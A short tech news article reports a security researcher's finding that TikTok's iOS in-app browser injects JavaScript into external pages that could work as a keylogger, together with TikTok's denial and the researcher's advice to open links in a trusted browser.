TikTok injects code into in-app browser, ‘does not use alleged keylogger’
TikTok injects code into third-party web pages when a user opens a browser page in the TikTok app. This code could serve as a keylogger, among other things. According to the social medium, the code in question is only used for development purposes.
The controversial code. Image via Felix Krause
Developer and security researcher Felix Krause discovered that when a user opens a link in the iOS version of TikTok, an in-app browser opens where the social medium can inject JavaScript code. This would allow the recording of data entered with the keyboard, including passwords, payment information and other data. He did not investigate whether this is also the case for the Android version of the application.
TikTok confirms opposite Forbes that the JavaScript code is indeed present, but that the messages about an alleged keylogger are misleading. The controversial piece of code is said to be an unused part of a third-party SDK. “Like other platforms, we also use an in-app browser to provide an optimal user experience. The relevant JavaScript code is used for debugging, troubleshooting and monitoring the performance of the application, for example to check the loading speed of a page and if the page crashes.”
Thus, the keylogger portion of the code from the third party SDK would not be used. It is not clear who this third party is and whether they would actually need a keylogger for development purposes. TikTok further suggests that certain registered data is only processed locally on the device and is not forwarded to servers of the social medium.
The researcher says in his findings, which are in line with the earlier discovery of tracking by Instagram and Facebook in in-app browsers, that TikTok’s statement could possibly be correct. “Just because an app injects JavaScript into external websites does not necessarily mean that the app is doing something malicious. There is no way to know exactly what data an in-app browser collects and whether this data is being forwarded or used.”
It is therefore not a given that TikTok does indeed register the keyboard input of users, let alone send it to its own servers or otherwise store it. It is, however, almost certain that this would be possible. For that reason, according to Krause, it is wise to copy browser links via TikTok, but also via Facebook and Instagram, and paste them directly into a trusted browser. In this way, the relevant applications cannot inject code to register sensitive data in this way.